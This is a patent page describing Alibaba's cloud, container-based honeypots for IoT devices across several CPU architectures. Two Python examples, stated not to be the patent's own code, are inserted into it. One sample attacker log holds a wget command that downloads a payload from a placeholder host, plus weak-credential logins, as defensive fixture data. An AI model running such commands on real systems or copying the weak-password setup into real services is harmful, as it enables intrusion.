CN110875904A - Method for realizing attack processing, honeypot deployment method, honeypot deployment medium and honeypot deployment device - Google Patents


Info

Publication number
CN110875904A
Application number
CN201811012513.9A
Authority
CN (China)
Legal status
Pending
Other languages
Chinese (zh)
Inventor
王佩
Current assignee
Alibaba Group Holding Ltd
Original assignee
Alibaba Group Holding Ltd
Prior art keywords
honeypot, cloud, mirror image, container, honeypots

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L 63/00 Network architectures or network communication protocols for network security
    • H04L 63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L 63/1441 Countermeasures against malicious traffic
    • H04L 63/1491 Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L 67/00 Network arrangements or protocols for supporting network services or applications
    • H04L 67/01 Protocols
    • H04L 67/10 Protocols in which an application is distributed across nodes in the network
    • H04L 67/1095 Replication or mirroring of data, e.g. scheduling or transport for data synchronisation between network nodes

Abstract

The application discloses a method and a device for implementing attack processing, and a honeypot deployment method, comprising at least the following steps: pulling a stored honeypot image from a honeypot image cloud repository, where the honeypot image is a honeypot structure supporting multiple CPU architectures; creating containers on a cloud host, where the containers correspond to honeypots supporting different CPU architectures; and capturing attack data with the honeypots supporting different CPU architectures. With this method, cloud-based deployment expands the capture range of the honeypots, provides flexible and dynamic management of the honeypot cluster, and, combined with cloud big-data analysis services, mines the value of honeypot data in depth; furthermore, the properties of containers reduce the cost of honeypot deployment and maintenance and save time.

Description

Method for realizing attack processing, honeypot deployment method, honeypot deployment medium and honeypot deployment device
Technical Field
The present application relates to, but is not limited to, network attack-defense technology, and in particular to a method for implementing attack processing based on the Internet of Things (IoT), a honeypot deployment method, a honeypot deployment medium, and a device.
Background
In the attack-defense contest in cyberspace, honeypot technology serves as intrusion bait that attracts attacks by hackers. After an attack, monitoring and analysis make it possible, on one hand, to investigate the source of the attack and the latest attacks and vulnerabilities launched against the server and, on the other hand, to check whether the protective security measures are effective. A honeypot is a security resource whose value lies in being scanned, attacked and compromised; that is, the honeypot has no other practical function, so any network traffic flowing into or out of it may indicate scanning, attack or compromise. The core value of a honeypot is to monitor, detect and analyze these attack activities.
Mainstream network attacks mainly target PCs, servers and the like based on the x86 CPU architecture, so the honeypot technology in the related art is also mainly applied to hosts of the x86 CPU architecture. In the related art, high-interaction honeypots mostly use virtual machine technology, in consideration of hardware resources, maintainability, isolation from real resources and so on: the honeypot is deployed in a virtual host, and such virtual-host-based high-interaction honeypots can capture attack sources, attack behavior data, malicious programs and the like aimed at servers deployed under the x86 CPU architecture.
The Internet of Things (IoT), also called a sensor network, is simply the extension of the Internet from people to objects. It refers to the huge network formed by combining various information-sensing devices, such as radio frequency identification devices, infrared sensors, global positioning systems and laser scanners, with the Internet, with the purpose of connecting all objects to the network for convenient identification and management. With the development of IoT, network attacks on IoT devices are becoming more serious, and the range of CPU architectures used by IoT devices is wider, for example the ARM (Advanced RISC Machine) and PowerPC architectures. On one hand, the honeypot technology of the related art cannot capture attacks on devices of these architectures; on the other hand, the deployment range of the honeypot is limited by the physical resources, IP resources and so on of the honeypot operator, so the attack behavior captured is limited; moreover, when a large number of honeypots need to be deployed across the Internet, the deployment and maintenance costs of conventional honeypots are high.
Disclosure of Invention
To solve the above technical problems, the present application provides a method for implementing attack processing, a honeypot deployment medium and a device, which can achieve wide-range protection against network attacks on IoT devices while reducing cost.
To achieve this object, the present application provides a method for implementing attack processing, including:
pulling a stored honeypot image from a honeypot image cloud repository, where the honeypot image is a honeypot structure supporting multiple CPU architectures;
creating containers on a cloud host, where the containers correspond to honeypots supporting different CPU architectures; and
capturing attack data with the honeypots supporting different CPU architectures.
Optionally, the method further includes: analyzing the attack data captured by the honeypots using cloud data analysis.
Optionally, the capture of data by the honeypots includes any combination of:
capturing records of attackers accessing a service;
capturing and parsing network packets, and obtaining the network connection behavior of the honeypot after the attacker has intruded into it from the parsed network information of the attacker; and
monitoring malicious files and obtaining information about the malicious files.
Optionally, when a new container needs to be deployed, the method further includes:
pulling the honeypot image from the honeypot image cloud repository and starting it quickly.
Optionally, pulling the honeypot image includes:
deploying a container client on the cloud host; and
obtaining the honeypot image from the honeypot image cloud repository using the container client.
Optionally, the container client includes the open-source container engine Docker.
Optionally, the method further includes: controlling the honeypots of different CPU architectures to be deployed on different cloud hosts.
Optionally, the method further includes:
packaging the network architecture information of the honeypots of different CPU architectures deployed on the different cloud hosts into a visual form for display; and
packaging the results of the cloud data analysis into a visual form for display.
Optionally, the multi-CPU architecture includes any combination of: the ARM (Advanced RISC Machine) architecture, the MIPS (Microprocessor without Interlocked Pipeline Stages) architecture and the PowerPC architecture.
The present application also provides a honeypot deployment method, including:
creating a honeypot image of a honeypot structure supporting multiple CPU architectures; and
synchronously storing the created honeypot image to a honeypot image cloud repository.
Optionally, the method further includes: pulling the honeypot image and creating containers on the cloud host, where the containers correspond to honeypots supporting different CPU architectures; and
capturing attack data with the honeypots supporting different CPU architectures.
Optionally, the method further includes: controlling the honeypots of different CPU architectures to be deployed on different cloud hosts.
Optionally, when a new container needs to be deployed, the method further includes:
pulling the honeypot image from the honeypot image cloud repository and starting it quickly.
Optionally, pulling the honeypot image includes:
deploying a container client on the cloud host; and
obtaining the honeypot image from the honeypot image cloud repository using the container client.
Optionally, the container client includes the open-source container engine Docker.
Optionally, the method further includes:
packaging the network architecture information of the honeypots of different CPU architectures controlled to be deployed on different cloud hosts into a visual form for display; and
packaging the results of the cloud data analysis into a visual form for display.
Optionally, the multi-CPU architecture includes any combination of: the ARM (Advanced RISC Machine) architecture, the MIPS (Microprocessor without Interlocked Pipeline Stages) architecture and the PowerPC architecture.
The present application further provides a computer-readable storage medium storing computer-executable instructions for performing any of the above methods for implementing attack processing and/or any of the above honeypot deployment methods.
The present application further provides an apparatus for implementing attack processing, including a memory and a processor, where the memory stores a computer program executable by the processor for performing the steps of any of the above methods for implementing attack processing and/or the steps of any of the above honeypot deployment methods.
With this method, cloud-based deployment expands the capture range of the honeypots, provides flexible and dynamic management of the honeypot cluster, and, combined with cloud big-data analysis services, mines the value of honeypot data in depth; furthermore, the properties of containers reduce the cost of honeypot deployment and maintenance, save time, and let the user concentrate on analyzing attack behavior data.
Further, the cloud- and container-based high-interaction IoT honeypot solves the problems that existing honeypots cannot detect attacks on IoT devices, cannot be deployed at multiple points across the whole network, and have high operation and maintenance labor costs.
Additional features and advantages of the invention will be set forth in the description which follows, and in part will be obvious from the description, or may be learned by practice of the invention. The objectives and other advantages of the invention will be realized and attained by the structure particularly pointed out in the written description and claims hereof as well as the appended drawings.
Drawings
The accompanying drawings are included to provide a further understanding of the claimed subject matter and are incorporated in and constitute a part of this specification, illustrate embodiments of the subject matter and together with the description serve to explain the principles of the subject matter and not to limit the subject matter.
FIG. 1 is a flowchart of a method for implementing attack processing according to the present application;
FIG. 2 is a schematic diagram of an embodiment of the structure of the honeypot of the present application;
FIG. 3 is a schematic diagram of a component structure of an apparatus for implementing attack processing according to the present application;
FIG. 4 is a schematic diagram of a honeypot architecture according to an embodiment of the present application.
Detailed Description
To make the objects, technical solutions and advantages of the present application more apparent, embodiments of the present application will be described in detail below with reference to the accompanying drawings. It should be noted that the embodiments and features of the embodiments in the present application may be arbitrarily combined with each other without conflict.
In one exemplary configuration of the present application, a computing device includes one or more processors (CPUs), input/output interfaces, a network interface, and memory.
The memory may include volatile memory in a computer-readable medium, such as random access memory (RAM), and/or non-volatile memory, such as read-only memory (ROM) or flash memory (flash RAM). Memory is an example of a computer-readable medium.
Computer-readable media, including both persistent and non-persistent, removable and non-removable media, may implement information storage by any method or technology. The information may be computer-readable instructions, data structures, program modules or other data. Examples of computer storage media include, but are not limited to, phase change memory (PRAM), static random access memory (SRAM), dynamic random access memory (DRAM), other types of random access memory (RAM), read-only memory (ROM), electrically erasable programmable read-only memory (EEPROM), flash memory or other memory technology, compact disc read-only memory (CD-ROM), digital versatile discs (DVD) or other optical storage, magnetic cassettes, magnetic tape, magnetic disk storage or other magnetic storage devices, or any other non-transmission medium that can be used to store information accessible by a computing device. As defined herein, computer-readable media does not include transitory media (transient media) such as modulated data signals and carrier waves.
The steps illustrated in the flowcharts of the figures may be performed in a computer system, for example as a set of computer-executable instructions. Also, although a logical order is shown in the flowcharts, in some cases the steps shown or described may be performed in a different order.
In the related art, the attack type mainly captured by honeypots is attacks on PCs and servers of the x86 CPU architecture. IoT devices use a greater variety of CPU architectures, and as attacks on IoT devices become more serious, the capability of the honeypots used in the related art is limited.
Fig. 1 is a flowchart of a method for implementing attack processing according to the present application. As shown in Fig. 1, the method includes:
Step 100: pulling the stored honeypot image from the honeypot image cloud repository, where the honeypot image is a honeypot structure supporting multiple CPU architectures.
Optionally, the honeypot image is a honeypot image of a honeypot structure supporting multiple CPU architectures, for example a first-CPU-architecture honeypot image, a second-CPU-architecture honeypot image and a third-CPU-architecture honeypot image. In this step, the honeypot image can be pulled using the container clients distributed on the cloud hosts.
The honeypot structure in this application includes, but is not limited to: emulating the environments of various CPU architectures with the open-source processor emulator QEMU, and deploying vulnerable services in each CPU architecture environment.
Because IoT devices are diverse, common IoT devices use many kinds of CPU architectures, such as ARM, MIPS (Microprocessor without Interlocked Pipeline Stages), PowerPC and so on, and specifically x86, armel, armhf, mips, mipsel, ppc, sh4 and amd64. In the embodiment of the present application, the Debian Linux system is chosen because it has many versions and is well supported on different CPU architectures: on one hand, Debian can be installed in every CPU architecture environment emulated with QEMU; on the other hand, common vulnerable services such as SSH and Telnet are installed on the system, and the honeypot lures attackers by configuring these services with weak passwords or unauthenticated login. Fig. 2 is a schematic view of an embodiment of the structure of a honeypot of the present application.
In the embodiment of the application, an image is a file structure. A Docker image may be used to create a Docker container. Each command in a Dockerfile creates a new layer in the file system; the file system is built from these layers, and the image is built on top of these union file systems. In this application, Docker provides a simple mechanism to create an image or update an existing image, and a user can also directly download a ready-made image from other users for direct use.
Pulling the honeypot image in this step includes:
deploying a container client, such as the open-source container engine Docker, on the cloud host; and
quickly pulling the honeypot image from the honeypot image cloud repository using the container client.
By way of example, as in Fig. 4, a container 1 corresponding to the 1st honeypot and a container 2 corresponding to the 2nd honeypot are created on the first cloud host; a container 1 corresponding to the 3rd honeypot and a container 2 corresponding to the 1st honeypot are created on the second cloud host; and a container 1 corresponding to the 4th honeypot and a container 2 corresponding to the 1st honeypot are created on the third cloud host. Here, different honeypots have different CPU architectures, for example: the 1st honeypot is an ARM honeypot, the 2nd honeypot is a MIPS honeypot, the 3rd honeypot is an SH4 honeypot and the 4th honeypot is a PowerPC honeypot.
In the embodiment of the application, the repository is used to store image files. After an image file is created, it can be uploaded to a public or private repository with a push command, so that if it needs to be used on another machine, it only needs to be obtained from the repository with a pull command. A process in a Docker container has write access only to the readable-writable layer; the other layers are read-only to the process.
Step 101: creating containers on the cloud host, where the containers correspond to honeypots supporting different CPU architectures.
In the embodiment of the application, multiple honeypots of different CPU architectures are deployed on multiple cloud hosts. Because the computing service provided by the cloud service provider is configurable and elastically scalable, the honeypots can be managed more flexibly according to demand by using these properties. For example, if intrusion attacks under a certain type of CPU architecture need attention, the number of honeypots of that CPU architecture can be increased and the number of honeypots of other CPU architectures reduced, so that the honeypot cluster is dynamically controlled according to demand.
Optionally, when a new container needs to be deployed, the method further includes:
rapidly expanding to new honeypot nodes by pulling and quickly starting the honeypot image from the honeypot image cloud repository using a container client such as the open-source container engine Docker.
In an actual network environment, services such as SSH and Telnet are commonly used and are easy for attackers to intrude. These services are deployed in system environments of different CPU architectures and configured with weak passwords or unauthenticated login to attract attackers, so that after an attacker logs into the system where the honeypot is located, further malicious operations are performed with the system's privileges.
In embodiments of the present application, a container is a running instance created from an image. Containers may be started, stopped and deleted. Containers are isolated from each other, which provides a secure platform. In the embodiment of the application, a container can be regarded as a simple Linux environment, and the open-source container engine Docker runs applications in containers.
Step 102: capturing attack data with the honeypots supporting different CPU architectures.
Through the honeypots, different types of attack behavior are captured, such as attack sources, attack behavior data and malicious programs targeting servers deployed under various CPU architectures.
In the embodiment of the application, because the data captured by the honeypots is stored in a cloud database, it can conveniently be analyzed with the online big-data analysis platform service provided by the cloud service provider; that is, the user does not need to build a big-data analysis cluster. The data captured by the honeypots is modeled and analyzed with methods such as machine learning and algorithms, so that deeper information contained in the honeypot data, such as attack behavior, attack samples and the relationships between attack organizations, is mined.
The method for implementing attack processing further includes:
analyzing the attack data captured by the honeypots in the containers using cloud data analysis.
The method also includes: capturing data with the honeypots.
Optionally, to capture data, a honeypot data acquisition client and a server are installed on each cloud host where honeypots are deployed; the client sends the acquired data to the server, which aggregates it and stores it in the honeypot database. Specifically, after an attacker successfully logs into the honeypot and performs operations in it, the client records attack information such as which commands the hacker ran, the contents of network connections, and which malicious samples were downloaded and run; it can further collect log information such as the order and time of the attacker's operations. The log information may include, but is not limited to: network traffic, attacker command logs, file samples and so on.
In one embodiment of the present application, the collection of honeypot data may include any combination of:
capturing records of attackers accessing and logging into the SSH and Telnet services;
capturing and parsing network packets, and analyzing the attacker's network information, such as IP data and application-layer data, to obtain information such as the honeypot's network connection behavior after the attacker has intruded into it; and
monitoring malicious files and obtaining information about them: when an attacker writes a new malicious file into the honeypot, storing a sample of the file, recording its creation time, calculating its hash value and so on.
Optionally, the method of the present application further includes: storing honeypot images of honeypot structures that support multiple CPU architectures.
Optionally, the method of the present application further includes: controlling the honeypots of different CPU architectures to be deployed on different cloud hosts, for example distributed in a cloud-based manner. Optionally, this specifically includes:
the cloud service provider has data centers in multiple regions around the world for users to choose from, and the IP ranges allocated to data centers in different regions differ, so the IP addresses assigned to the honeypots are controlled to be spread over different IP ranges, which enlarges the sample range of the captured attack behavior.
It should be noted that, in practical application, the functions of the cloud honeypot cluster control platform and the big-data analysis platform can be integrated, and the integrated functions are presented to the user uniformly in the form of a website.
Optionally, the method of the present application further includes:
packaging the network architecture information of the honeypots of different CPU architectures distributed over different cloud hosts in a cloud-based manner, together with the results of the cloud data analysis in step 101, into a visual form with a web interface that the user can view and interact with. The user can then access the device where the platform is located from terminal equipment such as a mobile terminal or a PC, check the operating status of the cloud honeypot cluster in real time, obtain the analysis results of the data captured by the honeypots, control the number of honeypots of each CPU architecture, and so quickly and conveniently learn the current IoT attack trend.
The cloud-based attack processing method enlarges the capture range of existing honeypots, provides an elastic and dynamic honeypot cluster management mode, and, combined with cloud big-data analysis services, can mine the value of honeypot data in depth; the properties of containers reduce honeypot deployment and maintenance cost, save time, and let the user concentrate on analyzing attack behavior data. Moreover, the cloud- and container-based high-interaction IoT honeypot solves the problems that existing honeypots cannot detect attacks on IoT devices, cannot be deployed at multiple points across the whole network, and have high operation and maintenance labor costs.
The present application also provides a honeypot deployment method, including: creating a honeypot image of a honeypot structure supporting multiple CPU architectures; and synchronously storing the created honeypot image to a honeypot image cloud repository.
When a honeypot deployed by this method is used to implement attack processing, the method further includes the following attack processing steps:
pulling the honeypot image and creating containers corresponding to honeypots supporting different CPU architectures on the cloud host; and
capturing different types of attack data with the honeypots supporting different CPU architectures.
The CPU architectures include, but are not limited to, any combination of: the ARM architecture, the MIPS architecture, the PowerPC architecture and so on.
The present application further provides a computer-readable storage medium storing computer-executable instructions for performing any of the above methods for implementing attack processing and/or any of the above honeypot deployment methods.
The present application further provides an apparatus for implementing attack processing, including a memory and a processor, where the memory stores a computer program executable by the processor for performing the steps of any of the above methods for implementing attack processing and/or the steps of any of the above honeypot deployment methods.
Fig. 3 is a schematic structural diagram of a device for implementing attack processing according to the present application, and as shown in fig. 3, the device at least includes: a preprocessing module and a capturing module; wherein the content of the first and second substances,
the preprocessing module is arranged for pulling the stored honeypot mirror image from the honeypot mirror image cloud warehouse, wherein the honeypot mirror image is a honeypot structure supporting a multi-CPU architecture; creating a container on a cloud host, wherein the container corresponds to honeypots supporting different CPU architectures;
and the capturing module is set to capture the attack data through honeypots supporting different CPU architectures.
Optionally, the apparatus for implementing attack processing according to the present application further includes:
an analysis module configured to analyze the attack data captured by the honeypots in the container using cloud data analysis.
Optionally, the honeypot mirror image pulled in the preprocessing module is specifically set as: deploying a container client such as an open source container engine docker on a cloud host; the honeypot mirror image can be quickly pulled from the honeypot mirror image cloud warehouse by using the container client.
Optionally, when a new container needs to be deployed, the preprocessing module is further configured to:
the rapid expansion of the new honeypot nodes can be realized by pulling and rapidly starting the honeypot mirror image in the storage module such as a honeypot mirror image cloud warehouse by using a container client such as an open source container engine docker.
Optionally, the apparatus of this application further includes: and the storage module is arranged for storing the honeypot mirror image of the honeypot structure supporting the multi-CPU architecture.
Optionally, the device of the present application further includes a honeypot database configured to store attack data captured by honeypots.
Optionally, the capturing module comprises a client and a server, wherein
the client is configured to record, once an attacker has successfully logged in to the honeypot, which commands the attacker ran, what network connections were made and what contents they carried, and which malicious samples were downloaded and run, and to send the collected data to the server;
and the server is configured to aggregate the data from the clients and store it in the honeypot database.
Optionally, the client is further configured to collect log information such as the order and time of the attacker's operations, which may include but is not limited to: network traffic, attacker command logs, file samples and the like.
Optionally, the data collected by the client may include any combination of the following:
records of attackers accessing and logging in to the SSH service and the Telnet service;
captured and parsed network packets, from which the attacker's network information, such as IP data and application layer data, is extracted so as to obtain the honeypot's network connection behavior after the attacker has broken into the honeypot;
and monitoring of malicious files: when an attacker writes a new malicious file into the honeypot, a sample of the file is stored, its creation time is recorded, its hash value is computed, and the like.
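The client/server capture module described above (and the honeypot data collection end of fig. 4) as an added Python example, not the patent's own code: the session log, attacker addresses and dropped file are constructed sample data, and the in-memory HoneypotDB stands in for the honeypot database.

```python
"""Honeypot capture client and server: constructed example, not the patent's
own code. The client turns the honeypot's session log and a file-system scan
into records (SSH/Telnet logins, the ordered command log, connections made
after the intrusion, and a sample with creation time and hash of each file the
attacker wrote); the server merges reports into a dict standing in for the
honeypot database, keeping one copy of each sample."""
import hashlib
import os
import tempfile
from collections import defaultdict

# Constructed session log in the form (unix time, service, attacker ip, event, detail)
SESSION_LOG = [
    (1535700000, "ssh", "203.0.113.77", "login", "root:123456"),
    (1535700003, "ssh", "203.0.113.77", "cmd", "uname -a"),
    (1535700005, "ssh", "203.0.113.77", "cmd", "cat /proc/cpuinfo"),
    (1535700011, "ssh", "203.0.113.77", "cmd", "wget http://198.51.100.9/x -O /tmp/x"),
    (1535700012, "ssh", "203.0.113.77", "conn", "198.51.100.9:80"),
    (1535700020, "telnet", "192.0.2.15", "login", "admin:admin"),
]
SAMPLE_BYTES = b"\x7fELF-constructed-sample"   # stands in for a dropped binary


def file_sample(path):
    """Record for one file the attacker wrote: bytes, creation time and hash."""
    with open(path, "rb") as f:
        data = f.read()
    return {"path": path, "size": len(data), "created": int(os.stat(path).st_ctime),
            "sha256": hashlib.sha256(data).hexdigest(), "sample": data}


def new_files(root, baseline):
    """Files under root whose relative path is not in the pristine image's baseline."""
    found = []
    for d, _, names in os.walk(root):
        for n in names:
            p = os.path.join(d, n)
            if os.path.relpath(p, root) not in baseline:
                found.append(p)
    return sorted(found)


def build_report(log, root, baseline):
    """Client side: one session's captures, each list in time order."""
    report = {"logins": [], "commands": [], "connections": [], "samples": []}
    for ts, svc, ip, event, detail in sorted(log):
        if event == "login":
            user, _, pw = detail.partition(":")
            report["logins"].append({"time": ts, "service": svc, "src_ip": ip,
                                     "user": user, "password": pw})
        elif event == "cmd":   # seq preserves the order in which commands were run
            report["commands"].append({"seq": len(report["commands"]) + 1,
                                       "time": ts, "src_ip": ip, "cmd": detail})
        elif event == "conn":
            dst, _, port = detail.rpartition(":")
            report["connections"].append({"time": ts, "src_ip": ip,
                                          "dst_ip": dst, "dst_port": int(port)})
    report["samples"] = [file_sample(p) for p in new_files(root, baseline)]
    return report


class HoneypotDB:
    """Server side: aggregate client reports (stands in for the cloud database)."""

    def __init__(self):
        self.attackers = defaultdict(lambda: {"logins": 0, "commands": [], "connections": []})
        self.samples = {}   # sha256 -> sample record, one copy per distinct file

    def ingest(self, report):
        for r in report["logins"]:
            self.attackers[r["src_ip"]]["logins"] += 1
        for r in report["commands"]:
            self.attackers[r["src_ip"]]["commands"].append(r["cmd"])
        for r in report["connections"]:
            self.attackers[r["src_ip"]]["connections"].append((r["dst_ip"], r["dst_port"]))
        for s in report["samples"]:
            self.samples.setdefault(s["sha256"], s)
        return len(self.samples)


def demo():
    """Build a throwaway honeypot file system, then run client and server once."""
    root = tempfile.mkdtemp(prefix="honeypot-")
    with open(os.path.join(root, "passwd"), "wb") as f:   # part of the pristine image
        f.write(b"root:x:0:0:root:/root:/bin/sh\n")
    with open(os.path.join(root, "x"), "wb") as f:        # written by the attacker
        f.write(SAMPLE_BYTES)
    report = build_report(SESSION_LOG, root, baseline={"passwd"})
    db = HoneypotDB()
    db.ingest(report)
    return report, db
```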
Optionally, the apparatus of the present application further includes a control module configured to control, in a cloud-based manner, the distribution and mounting of honeypots with different CPU architectures on different cloud hosts.
Optionally, the control module is specifically configured to:
make use of the fact that the cloud service provider has data centers in multiple regions around the world for users to choose from, and that the IP ranges allocated to data centers in different regions differ, so that the IP addresses mounted on the honeypots are controlled to be dispersed over different IP ranges, thereby enlarging the sample range of the captured attack behavior.
Optionally, the control module is further configured to: control honeypots of different CPU architectures to be distributed and mounted on different cloud hosts in a cloud-based manner, and package the network architecture information and the cloud data analysis results into a web interface that the user can view and interact with. A user can then access the device hosting the platform from a terminal such as a mobile terminal or a PC in order to check the running state of the cloud honeypot cluster in real time, obtain the analysis results of the data captured by the honeypots, and control the number of honeypots of each CPU architecture, so that the current IoT attack trend can be learned quickly and conveniently.
Fig. 4 is a schematic diagram of the composition of an embodiment of the honeypot architecture of the present application. As shown in fig. 4, the architecture at least includes a honeypot image cloud repository, a honeypot cluster comprising one or more cloud hosts (e.g., the first cloud host, the second cloud host, ..., the mth cloud host in fig. 4), a honeypot management platform, a cloud database, and a honeypot data collection end, wherein:
the honeypot image cloud repository is used for storing honeypot images of honeypot structures supporting multiple CPU architectures, such as the first CPU architecture honeypot image, the second CPU architecture honeypot image and the third CPU architecture honeypot image in fig. 4.
The honeypot structure in this application includes: simulating environments of various CPU (central processing unit) architectures with the open source processor emulator QEMU, and deploying vulnerable services in each CPU architecture environment.
Because IoT devices are diverse, the CPU architectures used by common IoT devices come in many types, such as ARM, MIPS (Microprocessor without Interlocked Pipeline Stages), PowerPC and the like, and specifically include x86, armel, armhf, mips, mipsel, ppc, sh4 and amd64. The present application takes into account that Linux distributions exist in many versions with good support for different CPU architectures, so that, on the one hand, a Linux system can be installed in every CPU architecture environment simulated with the open source processor emulator QEMU; on the other hand, common vulnerable services such as the SSH service and the Telnet service are installed on that system and configured with weak passwords or unauthenticated login, which is how the honeypot lures an attacker into attacking. Fig. 2 shows a schematic view of an embodiment of the honeypot structure of the present application.
In the present application, an image is a file system structure. A Docker image may be used to create a Docker container. Each instruction in a Dockerfile creates a new layer in the file system; the file system is built from these layers, and the image is built on top of this union file system. In this application, Docker provides a simple mechanism for creating an image or updating an existing one, so that a user can also directly download a ready-made image published by other users and use it as-is.
In a real network environment, the SSH service, the Telnet service and the like are commonly used and are easy targets for attackers; these services are deployed in system environments of different CPU architectures and configured with weak passwords or unauthenticated login to attract attackers, so that after an attacker logs in to the system hosting the honeypot, further malicious operations are performed using the system's privileges.
A container client, such as the open source container engine Docker, is deployed on each cloud host; with it, the honeypot image can be pulled quickly from the honeypot image cloud repository and a container for the corresponding honeypot created. By way of example, as in fig. 4, container 1 corresponding to the 1st honeypot and container 2 corresponding to the 2nd honeypot are created on the first cloud host; container 1 corresponding to the 3rd honeypot and container 2 corresponding to the 1st honeypot are created on the second cloud host; and container 1 corresponding to the 4th honeypot and container 2 corresponding to the 1st honeypot are created on the third cloud host. Here, different honeypots have different CPU architectures, for example: the 1st honeypot is an ARM honeypot, the 2nd honeypot is a MIPS honeypot, the 3rd honeypot is an SH4 honeypot, and the 4th honeypot is a PowerPC honeypot.
In this application, when a new container needs to be deployed, the honeypot image in the honeypot image cloud repository is pulled and started quickly using a container client such as the open source container engine Docker, so that new honeypot nodes can be expanded rapidly.
The honeypot data collection end is used for collecting the behavior data of attackers interacting with the honeypots, that is, the data captured by the honeypots, and storing it in the cloud database.
The cloud honeypot management platform is provided with at least a big data analysis platform, which is used for analyzing the data captured by the honeypots.
In this method, the data captured by the honeypots is stored in the cloud database, which makes it convenient to analyze it with the online big data analysis service offered by the cloud service provider; that is, the user does not need to build a big data analysis cluster, and the data captured by the honeypots can be modeled and analyzed with approaches such as machine learning and other algorithms, so as to mine the deeper information contained in the honeypot data, such as attack behaviors, attack samples and the relationships between attacking organizations.
The honeypot architecture shown in fig. 4 of the present application further includes a cloud honeypot cluster control platform, which is arranged in the cloud honeypot management platform and used for controlling, in a cloud-based manner, the distribution and mounting of honeypots with different CPU architectures on the cloud hosts of the cloud honeypot cluster. Specifically, the cloud service provider has data centers in multiple regions around the world for users to choose from, and the IP ranges allocated to data centers in different regions differ, so the IP addresses mounted on the honeypots are controlled to be dispersed over different IP ranges, thereby enlarging the sample range of the captured attack behavior.
It should be noted that, in practical applications, the functions of the cloud honeypot cluster control platform and the big data analysis platform can be integrated and presented to the user together in the form of a website.
As shown in fig. 4, honeypots of different CPU architectures are deployed on multiple cloud hosts. Because the computing service provided by the cloud service provider is configurable and elastically scalable, honeypots can be managed more flexibly according to demand by combining these characteristics. For example, if intrusion attacks under a certain CPU architecture need attention, the number of honeypots of that CPU architecture can be flexibly increased and the number of honeypots of other CPU architectures reduced, so that the honeypot cluster is controlled dynamically according to demand.
In this application, the results of the cloud honeypot cluster control platform and of the big data analysis platform can be packaged into a platform with a web interface that the user can view and interact with. A user can then access the device hosting the platform from a terminal such as a mobile terminal or a PC in order to check the running state of the cloud honeypot cluster in real time, obtain the analysis results of the data captured by the honeypots, and control the number of honeypots of each CPU architecture, so that the current IoT attack trend can be learned quickly and conveniently.
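The cluster control described for the control module above and for the cloud honeypot cluster control platform of fig. 4, as an added Python example that is not the patent's own code: it spreads honeypots of several CPU architectures over cloud hosts in different regions and IP ranges, emits the Docker commands as a dry run, and rescales one architecture up or down on demand. The host names, addresses, registry name, image tags and host-port mapping are all assumptions.

```python
"""Cloud honeypot cluster control: constructed example, not the patent's own
code. Honeypots of several CPU architectures are spread over cloud hosts in
different regions (hence different IP ranges), and reconcile() returns the
docker commands (a dry run; nothing is executed) that pull each
architecture's honeypot image from the image repository and start or remove
containers until the desired count per architecture is reached."""
from collections import Counter
from dataclasses import dataclass, field
import ipaddress

# Assumed naming convention: one image tag per CPU architecture in the repository.
REGISTRY = "registry.example.invalid/honeypots"   # placeholder, not a real registry


def image_for(arch):
    return f"{REGISTRY}/honeypot:{arch}"


@dataclass
class CloudHost:
    name: str
    region: str
    public_ip: str
    containers: list = field(default_factory=list)  # (name, arch, host port base)

    @property
    def ip_section(self):
        """/24 that the provider allocated to this host's region (assumption)."""
        return str(ipaddress.ip_network(f"{self.public_ip}/24", strict=False))

    def count(self, arch):
        return sum(1 for _, a, _ in self.containers if a == arch)

    def free_port_base(self):
        """Each container maps its SSH/Telnet ports onto its own host-port block."""
        used = {p for _, _, p in self.containers}
        base = 2000
        while base in used:
            base += 10
        return base


def pick_host(hosts, arch):
    """Prefer an IP range that does not yet run this architecture, then the least
    loaded host, then name order, so placement is deterministic."""
    load = Counter(h.ip_section for h in hosts for _, a, _ in h.containers if a == arch)
    return min(hosts, key=lambda h: (load[h.ip_section], len(h.containers), h.name))


def reconcile(hosts, desired):
    """Move the cluster to `desired` ({arch: count}); returns the commands and
    updates `hosts` in place as if they had run."""
    commands = []
    for arch, want in desired.items():
        have = sum(h.count(arch) for h in hosts)
        for _ in range(have, want):                      # scale up
            host = pick_host(hosts, arch)
            used = {n for h in hosts for n, _, _ in h.containers}
            n = 1
            while f"hp-{arch}-{n}" in used:
                n += 1
            name, base = f"hp-{arch}-{n}", host.free_port_base()
            commands.append(f"[{host.name}] docker pull {image_for(arch)}")
            commands.append(
                f"[{host.name}] docker run -d --restart unless-stopped --name {name} "
                f"-p {base + 22}:22 -p {base + 23}:23 {image_for(arch)}")
            host.containers.append((name, arch, base))
        for _ in range(want, have):                      # scale down
            host = max(hosts, key=lambda h: (h.count(arch), h.name))
            idx = max(i for i, (_c, a, _p) in enumerate(host.containers) if a == arch)
            name = host.containers.pop(idx)[0]
            commands.append(f"[{host.name}] docker rm -f {name}")
    return commands


if __name__ == "__main__":
    cluster = [CloudHost("cn-host-1", "cn-hangzhou", "203.0.113.10"),
               CloudHost("us-host-1", "us-west", "198.51.100.20"),
               CloudHost("eu-host-1", "eu-central", "192.0.2.30")]
    for cmd in reconcile(cluster, {"armhf": 3, "mipsel": 2}):
        print(cmd)
    print("focus on ARM:", reconcile(cluster, {"armhf": 4, "mipsel": 1}))
```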
The honeypot architecture shown in fig. 4 of the present application is a cloud-based honeypot architecture. Cloud computing is a pay-per-use model that provides available, convenient, on-demand network access to a configurable shared pool of computing resources, including but not limited to networks, servers, storage, applications and services, which can be provisioned quickly with little administrative effort or interaction with the service provider. By making use of this elasticity, wider IP resources and computing resources are obtained, and the capture range of the honeypots on the Internet is expanded; in addition, some cloud service providers offer services such as big data computing, which help users to better mine the value of the data.
